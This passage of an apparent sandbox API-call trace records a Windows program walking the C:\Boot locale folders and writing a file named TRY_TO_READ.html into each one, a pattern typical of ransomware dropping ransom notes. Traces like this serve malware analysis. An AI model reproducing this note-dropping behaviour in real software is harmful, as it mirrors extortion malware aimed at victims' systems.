Flags=0x0, Size=0x20) returned 0x34e468 [0116.481] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344688 [0116.481] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0116.481] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324170 | out: hHeap=0x2e0000) returned 1 [0116.481] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344688 | out: hHeap=0x2e0000) returned 1 [0116.481] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e468 | out: hHeap=0x2e0000) returned 1 [0116.481] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344688 [0116.481] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x18) returned 0x343250 [0116.481] FindNextFileW (in: hFindFile=0x317b88, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nb-NO", cAlternateFileName="")) returned 1 [0116.481] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.481] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.482] GetLastError () returned 0x0 [0116.482] SetLastError (dwErrCode=0x0) [0116.482] GetLastError () returned 0x0 [0116.482] SetLastError (dwErrCode=0x0) [0116.482] GetLastError () returned 0x0 [0116.482] SetLastError (dwErrCode=0x0) [0116.482] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e468 [0116.482] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e490 [0116.482] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e4b8 [0116.482] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330a38 [0116.482] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330a48 [0116.482] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0116.482] GetLastError () returned 0x0 [0116.482] SetLastError (dwErrCode=0x0) [0116.482] GetLastError () returned 0x0 [0116.482] SetLastError (dwErrCode=0x0) [0116.482] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324200 [0116.482] CreateFileW (lpFileName="C:\\\\Boot\\nb-NO\\TRY_TO_READ.html" (normalized: "c:\\boot\\nb-no\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d8 [0116.483] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324200 | out: hHeap=0x2e0000) returned 1 [0116.483] WriteFile (in: hFile=0x3d8, lpBuffer=0x348ed8*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x348ed8*, lpNumberOfBytesWritten=0x2acfb00*=0x548, lpOverlapped=0x0) returned 1 [0116.483] WriteFile (in: hFile=0x3d8, lpBuffer=0x45a1f8*, nNumberOfBytesToWrite=0xf28, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x45a1f8*, lpNumberOfBytesWritten=0x2acfb00*=0xf28, lpOverlapped=0x0) returned 1 [0116.483] WriteFile (in: hFile=0x3d8, lpBuffer=0x4428d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x4428d0*, lpNumberOfBytesWritten=0x2acfb00*=0x4b, lpOverlapped=0x0) returned 1 [0116.484] CloseHandle (hObject=0x3d8) returned 1 [0116.484] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324170 | out: hHeap=0x2e0000) returned 1 [0116.484] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330a48 | out: hHeap=0x2e0000) returned 1 [0116.484] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330a38 | out: hHeap=0x2e0000) returned 1 [0116.484] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e4b8 | out: hHeap=0x2e0000) returned 1 [0116.484] FindNextFileW (in: hFindFile=0x317b88, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nl-NL", cAlternateFileName="")) returned 1 [0116.484] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.484] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.484] GetLastError () returned 0x0 [0116.484] SetLastError (dwErrCode=0x0) [0116.484] GetLastError () returned 0x0 [0116.484] SetLastError (dwErrCode=0x0) [0116.484] GetLastError () returned 0x0 [0116.484] SetLastError (dwErrCode=0x0) [0116.484] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e4b8 [0116.484] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e4e0 [0116.484] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e508 [0116.484] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330a38 [0116.484] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330a48 [0116.484] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0116.484] GetLastError () returned 0x0 [0116.484] SetLastError (dwErrCode=0x0) [0116.484] GetLastError () returned 0x0 [0116.484] SetLastError (dwErrCode=0x0) [0116.485] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324200 [0116.485] CreateFileW (lpFileName="C:\\\\Boot\\nl-NL\\TRY_TO_READ.html" (normalized: "c:\\boot\\nl-nl\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d8 [0116.485] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324200 | out: hHeap=0x2e0000) returned 1 [0116.485] WriteFile (in: hFile=0x3d8, lpBuffer=0x348ed8*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x348ed8*, lpNumberOfBytesWritten=0x2acfb00*=0x548, lpOverlapped=0x0) returned 1 [0116.486] WriteFile (in: hFile=0x3d8, lpBuffer=0x45a1f8*, nNumberOfBytesToWrite=0xf28, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x45a1f8*, lpNumberOfBytesWritten=0x2acfb00*=0xf28, lpOverlapped=0x0) returned 1 [0116.486] WriteFile (in: hFile=0x3d8, lpBuffer=0x4428d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x4428d0*, lpNumberOfBytesWritten=0x2acfb00*=0x4b, lpOverlapped=0x0) returned 1 [0116.487] CloseHandle (hObject=0x3d8) returned 1 [0116.487] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324170 | out: hHeap=0x2e0000) returned 1 [0116.487] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330a48 | out: hHeap=0x2e0000) returned 1 [0116.487] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330a38 | out: hHeap=0x2e0000) returned 1 [0116.487] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e508 | out: hHeap=0x2e0000) returned 1 [0116.487] FindNextFileW (in: hFindFile=0x317b88, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pl-PL", cAlternateFileName="")) returned 1 [0116.487] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.487] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.487] GetLastError () returned 0x0 [0116.487] SetLastError (dwErrCode=0x0) [0116.487] GetLastError () returned 0x0 [0116.487] SetLastError (dwErrCode=0x0) [0116.487] GetLastError () returned 0x0 [0116.487] SetLastError (dwErrCode=0x0) [0116.487] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e508 [0116.487] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e530 [0116.487] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e558 [0116.487] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330a38 [0116.487] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330a48 [0116.487] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0116.487] GetLastError () returned 0x0 [0116.487] SetLastError (dwErrCode=0x0) [0116.487] GetLastError () returned 0x0 [0116.487] SetLastError (dwErrCode=0x0) [0116.487] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324200 [0116.487] CreateFileW (lpFileName="C:\\\\Boot\\pl-PL\\TRY_TO_READ.html" (normalized: "c:\\boot\\pl-pl\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d8 [0116.488] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324200 | out: hHeap=0x2e0000) returned 1 [0116.488] WriteFile (in: hFile=0x3d8, lpBuffer=0x348ed8*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x348ed8*, lpNumberOfBytesWritten=0x2acfb00*=0x548, lpOverlapped=0x0) returned 1 [0116.489] WriteFile (in: hFile=0x3d8, lpBuffer=0x45a1f8*, nNumberOfBytesToWrite=0xf28, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x45a1f8*, lpNumberOfBytesWritten=0x2acfb00*=0xf28, lpOverlapped=0x0) returned 1 [0116.489] WriteFile (in: hFile=0x3d8, lpBuffer=0x4428d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x4428d0*, lpNumberOfBytesWritten=0x2acfb00*=0x4b, lpOverlapped=0x0) returned 1 [0116.489] CloseHandle (hObject=0x3d8) returned 1 [0116.489] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324170 | out: hHeap=0x2e0000) returned 1 [0116.489] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330a48 | out: hHeap=0x2e0000) returned 1 [0116.489] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330a38 | out: hHeap=0x2e0000) returned 1 [0116.489] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e558 | out: hHeap=0x2e0000) returned 1 [0116.489] FindNextFileW (in: hFindFile=0x317b88, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pt-BR", cAlternateFileName="")) returned 1 [0116.489] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.489] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.489] GetLastError () returned 0x0 [0116.489] SetLastError (dwErrCode=0x0) [0116.489] GetLastError () returned 0x0 [0116.489] SetLastError (dwErrCode=0x0) [0116.489] GetLastError () returned 0x0 [0116.489] SetLastError (dwErrCode=0x0) [0116.490] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e558 [0116.490] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e580 [0116.490] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e5a8 [0116.490] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330a38 [0116.490] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330a48 [0116.490] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0116.490] GetLastError () returned 0x0 [0116.490] SetLastError (dwErrCode=0x0) [0116.490] GetLastError () returned 0x0 [0116.490] SetLastError (dwErrCode=0x0) [0116.490] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324200 [0116.490] CreateFileW (lpFileName="C:\\\\Boot\\pt-BR\\TRY_TO_READ.html" (normalized: "c:\\boot\\pt-br\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d8 [0116.491] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324200 | out: hHeap=0x2e0000) returned 1 [0116.491] WriteFile (in: hFile=0x3d8, lpBuffer=0x348ed8*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x348ed8*, lpNumberOfBytesWritten=0x2acfb00*=0x548, lpOverlapped=0x0) returned 1 [0116.492] WriteFile (in: hFile=0x3d8, lpBuffer=0x45a1f8*, nNumberOfBytesToWrite=0xf28, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x45a1f8*, lpNumberOfBytesWritten=0x2acfb00*=0xf28, lpOverlapped=0x0) returned 1 [0116.492] WriteFile (in: hFile=0x3d8, lpBuffer=0x4428d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x4428d0*, lpNumberOfBytesWritten=0x2acfb00*=0x4b, lpOverlapped=0x0) returned 1 [0116.492] CloseHandle (hObject=0x3d8) returned 1 [0116.492] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324170 | out: hHeap=0x2e0000) returned 1 [0116.492] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330a48 | out: hHeap=0x2e0000) returned 1 [0116.492] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330a38 | out: hHeap=0x2e0000) returned 1 [0116.492] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e5a8 | out: hHeap=0x2e0000) returned 1 [0116.492] FindNextFileW (in: hFindFile=0x317b88, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pt-PT", cAlternateFileName="")) returned 1 [0116.492] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.492] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.492] GetLastError () returned 0x0 [0116.492] SetLastError (dwErrCode=0x0) [0116.492] GetLastError () returned 0x0 [0116.492] SetLastError (dwErrCode=0x0) [0116.492] GetLastError () returned 0x0 [0116.492] SetLastError (dwErrCode=0x0) [0116.493] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e5a8 [0116.493] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e5d0 [0116.493] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e5f8 [0116.493] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330a38 [0116.493] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330a48 [0116.493] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0116.493] GetLastError () returned 0x0 [0116.493] SetLastError (dwErrCode=0x0) [0116.493] GetLastError () returned 0x0 [0116.493] SetLastError (dwErrCode=0x0) [0116.493] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324200 [0116.493] CreateFileW (lpFileName="C:\\\\Boot\\pt-PT\\TRY_TO_READ.html" (normalized: "c:\\boot\\pt-pt\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d8 [0116.493] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324200 | out: hHeap=0x2e0000) returned 1 [0116.493] WriteFile (in: hFile=0x3d8, lpBuffer=0x348ed8*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x348ed8*, lpNumberOfBytesWritten=0x2acfb00*=0x548, lpOverlapped=0x0) returned 1 [0116.494] WriteFile (in: hFile=0x3d8, lpBuffer=0x45a1f8*, nNumberOfBytesToWrite=0xf28, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x45a1f8*, lpNumberOfBytesWritten=0x2acfb00*=0xf28, lpOverlapped=0x0) returned 1 [0116.494] WriteFile (in: hFile=0x3d8, lpBuffer=0x4428d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x4428d0*, lpNumberOfBytesWritten=0x2acfb00*=0x4b, lpOverlapped=0x0) returned 1 [0116.494] CloseHandle (hObject=0x3d8) returned 1 [0116.495] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324170 | out: hHeap=0x2e0000) returned 1 [0116.495] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330a48 | out: hHeap=0x2e0000) returned 1 [0116.495] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330a38 | out: hHeap=0x2e0000) returned 1 [0116.495] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e5f8 | out: hHeap=0x2e0000) returned 1 [0116.495] FindNextFileW (in: hFindFile=0x317b88, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ru-RU", cAlternateFileName="")) returned 1 [0116.495] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.495] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.495] GetLastError () returned 0x0 [0116.495] SetLastError (dwErrCode=0x0) [0116.495] GetLastError () returned 0x0 [0116.495] SetLastError (dwErrCode=0x0) [0116.495] GetLastError () returned 0x0 [0116.495] SetLastError (dwErrCode=0x0) [0116.495] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e5f8 [0116.495] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e620 [0116.495] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e648 [0116.495] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330a38 [0116.495] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330a48 [0116.495] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0116.495] GetLastError () returned 0x0 [0116.495] SetLastError (dwErrCode=0x0) [0116.495] GetLastError () returned 0x0 [0116.495] SetLastError (dwErrCode=0x0) [0116.495] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324200 [0116.495] CreateFileW (lpFileName="C:\\\\Boot\\ru-RU\\TRY_TO_READ.html" (normalized: "c:\\boot\\ru-ru\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d8 [0116.496] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324200 | out: hHeap=0x2e0000) returned 1 [0116.496] WriteFile (in: hFile=0x3d8, lpBuffer=0x348ed8*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x348ed8*, lpNumberOfBytesWritten=0x2acfb00*=0x548, lpOverlapped=0x0) returned 1 [0116.497] WriteFile (in: hFile=0x3d8, lpBuffer=0x45a1f8*, nNumberOfBytesToWrite=0xf28, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x45a1f8*, lpNumberOfBytesWritten=0x2acfb00*=0xf28, lpOverlapped=0x0) returned 1 [0116.497] WriteFile (in: hFile=0x3d8, lpBuffer=0x4428d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x4428d0*, lpNumberOfBytesWritten=0x2acfb00*=0x4b, lpOverlapped=0x0) returned 1 [0116.498] CloseHandle (hObject=0x3d8) returned 1 [0116.498] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324170 | out: hHeap=0x2e0000) returned 1 [0116.498] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330a48 | out: hHeap=0x2e0000) returned 1 [0116.498] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330a38 | out: hHeap=0x2e0000) returned 1 [0116.498] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e648 | out: hHeap=0x2e0000) returned 1 [0116.498] FindNextFileW (in: hFindFile=0x317b88, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sv-SE", cAlternateFileName="")) returned 1 [0116.498] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.498] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.498] GetLastError () returned 0x0 [0116.498] SetLastError (dwErrCode=0x0) [0116.498] GetLastError () returned 0x0 [0116.498] SetLastError (dwErrCode=0x0) [0116.498] GetLastError () returned 0x0 [0116.498] SetLastError (dwErrCode=0x0) [0116.498] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e648 [0116.498] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x3506b0 [0116.498] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x3506d8 [0116.498] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330a38 [0116.498] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330a48 [0116.498] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0116.498] GetLastError () returned 0x0 [0116.498] SetLastError (dwErrCode=0x0) [0116.498] GetLastError () returned 0x0 [0116.499] SetLastError (dwErrCode=0x0) [0116.499] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324200 [0116.499] CreateFileW (lpFileName="C:\\\\Boot\\sv-SE\\TRY_TO_READ.html" (normalized: "c:\\boot\\sv-se\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d8 [0116.499] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324200 | out: hHeap=0x2e0000) returned 1 [0116.499] WriteFile (in: hFile=0x3d8, lpBuffer=0x348ed8*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x348ed8*, lpNumberOfBytesWritten=0x2acfb00*=0x548, lpOverlapped=0x0) returned 1 [0116.500] WriteFile (in: hFile=0x3d8, lpBuffer=0x45a1f8*, nNumberOfBytesToWrite=0xf28, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x45a1f8*, lpNumberOfBytesWritten=0x2acfb00*=0xf28, lpOverlapped=0x0) returned 1 [0116.500] WriteFile (in: hFile=0x3d8, lpBuffer=0x4428d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x4428d0*, lpNumberOfBytesWritten=0x2acfb00*=0x4b, lpOverlapped=0x0) returned 1 [0116.500] CloseHandle (hObject=0x3d8) returned 1 [0116.500] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324170 | out: hHeap=0x2e0000) returned 1 [0116.500] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330a48 | out: hHeap=0x2e0000) returned 1 [0116.500] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330a38 | out: hHeap=0x2e0000) returned 1 [0116.500] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3506d8 | out: hHeap=0x2e0000) returned 1 [0116.500] FindNextFileW (in: hFindFile=0x317b88, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tr-TR", 